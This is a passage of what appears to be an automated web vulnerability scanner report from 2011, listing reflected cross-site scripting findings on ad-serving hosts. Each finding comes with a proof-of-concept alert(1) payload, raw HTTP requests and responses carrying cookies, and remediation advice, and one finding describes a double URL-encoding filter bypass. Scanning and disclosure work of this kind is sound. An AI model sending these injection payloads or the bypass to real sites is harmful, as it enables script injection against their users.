Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:59 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683579:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:59 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function ...[SNIP]...
1.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f68cc'-alert(1)-'ca9f21a572f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:54:20 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683660:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:54:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 851
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12676"-alert(1)-"e19a228f6fc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacb0"-alert(1)-"739720fb74 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1679
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20962"-alert(1)-"2a1d1d242bf was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96c1d"-alert(1)-"ac8d47e6ca4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81851%2522%253balert%25281%2529%252f%252faa8ae4a84fa was submitted in the REST URL parameter 2. This input was echoed as 81851";alert(1)//aa8ae4a84fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135781851%2522%253balert%25281%2529%252f%252faa8ae4a84fa/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956 was submitted in the REST URL parameter 3. This input was echoed as 3e6b8";alert(1)//7ebd7131956 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c105a"-alert(1)-"fb1bd8b3ce2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f5e6"-alert(1)-"d81f699c354 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b539"-alert(1)-"67ea36dc1c6 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
1.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7423b"-alert(1)-"cb6a6387cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1682
1.56. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.yieldmanager.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0da"-alert(1)-"8c42b551633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f&bf0da"-alert(1)-"8c42b551633=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; ih="b!!!!9!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; 